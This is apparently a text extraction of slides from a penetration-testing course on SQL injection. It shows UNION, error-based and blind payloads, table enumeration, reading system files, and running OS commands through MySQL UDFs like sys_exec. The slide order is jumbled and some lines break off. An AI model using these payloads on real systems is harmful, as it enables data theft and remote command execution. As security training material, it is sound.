4 SQL Injections
4 SQL Injections
4.6. SQLMap
The above code queries the database, asking for the name
and the description of a record in the products table. In
this example, the selected record will have id value equal 9.
Penetration Testing Professional 5.0 – Caendra Inc. © 2018
In order to better understand SQLi you need to know the
basic syntax of a SELECT statement:
https://www.w3schools.com/sql/sql_intro.asp
• The result of the query is a table containing a row with the Hat
item and all the usernames and passwords from the Accounts
table:
Name Description
Hat Black hat
admin HxZsO9AR
staff ihKdNTU4
user Iwsi7Ks8
Penetration Testing Professional 5.0 – Caendra Inc. © 2018
• You can also perform a UNION operation with some
chosen data:
> SELECT Name, Description FROM Products WHERE ID='3' UNION SELECT
'Example', 'Data';
$dbhostname='1.2.3.4';
$dbuser='username';
$dbpassword='password';
$dbname='database';
$id = $_GET['id'];
' OR 'a'='a
Error
Management
Penetration Testing Professional 5.0 – Caendra Inc. © 2018
Example:
To exploit an error-based injection, the penetration tester needs to
use advanced DBMS features. Errors could be sent either via the
web application output or by other means such us automated
reports or warning emails.
Error
Management
Penetration Testing Professional 5.0 – Caendra Inc. © 2018
A web application vulnerable to blind SQL injection does not
reflect the results of the injection on the output. In this case
the penetration tester must find an inference method to
exploit the vulnerability.
Don’t worry!!
Everything you have just seen will all fall into place!
Example:
You have an error in your SQL syntax. Check the manual that
corresponds to your MySQL server version for the right syntax to
use near [query snippet]
SELECT <field list> FROM <table> UNION SELECT <field list> FROM <another table>;
Users
user_id (int) Cc_num (int) CVS(int)
1 0000 1111 2222 3333 123
2 0123 4567 8901 2345 321
Users
user_id (int) Cc_num (int) CVS(int)
1 0000 1111 2222 3333 123
2 0123 4567 8901 2345 321
<?php
$rs=mysql_query("SELECT real_name FROM users WHERE id=".$_GET['id'].";");
$row=mysql_fetch_assoc($rs);
echo $row['real_name'];
?> SQL injection!
This comments out any other SQL code which could follow
our injection point.
Penetration Testing Professional 5.0 – Caendra Inc. © 2018
There are many things to note in the previous attack:
• The field types of the second SELECT statement should match
the ones in the first statement
• The number of fields in the second SELECT statement should
match the number of the fields in the first statement
• To successfully perform the attack, we need to know the
structure of the database in terms of tables and column
names
• MySQL error:
The used SELECT statements have a different number of columns
MS SQL error:
All queries in an SQL statement containing a UNION operator
must have an equal number of expressions in their target
lists
ERROR: each UNION query must have the same number of columns
• Oracle error:
SELECT field1, field2 FROM table where id='1138' UNION SELECT null, null; -- -
<remainder of the original query>
• To:
This is the part of the SQL that will trigger the error.
We are asking the database to look for integer value 1 within
a varchar column.
Example:
• xtype='U'
• Means that we are only interested in user defined tables
• name NOT IN ('<known table list>')
• name is a column of the "sysobjects" special table. Every time
we find a new table we will append it to the NOT IN list. This is
needed because the error displays only the first table name
Penetration Testing Professional 5.0 – Caendra Inc. © 2018
Example:
If a database contains three tables:
• HR
• Customers
• Products
<known table list> will:
• Be empty in the first payload. ... name NOT IN ('') will
work!
• Contain 'HR' at the second step
• Contain 'HR', 'Customer', 'Products' at the last step
Penetration Testing Professional 5.0 – Caendra Inc. © 2018
After retrieving the tables of a database, it is also possible to
recover the columns of each table. This is the schema of the
database and we can retrieve it by using the following
payload template:
ASCII(UPPER(SUBSTRING((<query>),<position>, 1)))=
ASCII(SUBSTRING((<query>), <position>, 1))
ASCII(LOWER(SUBSTRING((<query>),<position>, 1)))=
ASCII(SUBSTRING((<query>), <position>, 1))
You can also copy the POST string from a request intercepted
with Burp Proxy.
if (!preg_match(|'^[a-z\s-]$|i', $name)) {
die('Please enter a valid name');
}
The victim server will connect to our SQL server, read the exe
file from the table and recreate it remotely.
Penetration Testing Professional 5.0 – Caendra Inc. © 2018
Now that you know everything about advanced exploitation
of SQL Server, let’s see a technique to save the results of
these stored procedures in a temporary table.
Then we can read the results by using some data dumping
techniques.
create table temptable (id int not null identity (1,1), output
nvarchar(4096) null);--
0x640069007200200063003a005c00
https://dev.mysql.com/doc/refman/8.0/en/privileges-provided.html#priv_file
By using this method, you can convert any binary file to a long
hex string that you can use to steal any data from the server.
+--------------------------------------------------------------------------------+
| output |
+--------------------------------------------------------------------------------+
| root:x:0:0:root:/root:/bin/bash |
| daemon:x:1:1:daemon:/usr/sbin:/bin/sh |
| bin:x:2:2:bin:/bin:/bin/sh |
| sys:x:3:3:sys:/dev:/bin/sh |
| sync:x:4:65534:sync:/bin:/bin/sync |
| games:x:5:60:games:/usr/games:/bin/sh |
| . . . |
+--------------------------------------------------------------------------------+
But, how can you load a binary file into a table via SQL
injections?
You have to convert it into an hex-string.
And how can you do that?
By using MySQL!
Penetration Testing Professional 5.0 – Caendra Inc. © 2018
Example:
mysql> LOAD DATA INFILE '/tmp/ls.dmp' INTO TABLE mytable FIELDS TERMINATED BY 'sOmErandOM'
LINES TERMINATED BY 'oTHerRnD' (data);
Query OK, 1 row affected (0.01 sec)
Records: 1 Deleted: 0 Skipped: 0 Warnings: 0
First you have to perform an insert with the first chunk. Next,
you have to update the field by adding the other chunks.
SELECT <victim field> FROM <victim table> WHERE <optional conditions> INTO
DUMPFILE '<output path>';
Then you can use them. You can find the source code of those
functions here. Moreover you can find the compiled versions
in the SQLMap repository.
http://www.mysqludf.org/
https://github.com/sqlmapproject/sqlmap/tree/master/udf/mysql
Penetration Testing Professional 5.0 – Caendra Inc. © 2018
After uploading the files to the target system, running a
command is just a matter of performing a SELECT:
SELECT sys_eval('<command>');
SELECT sys_exec('<command>');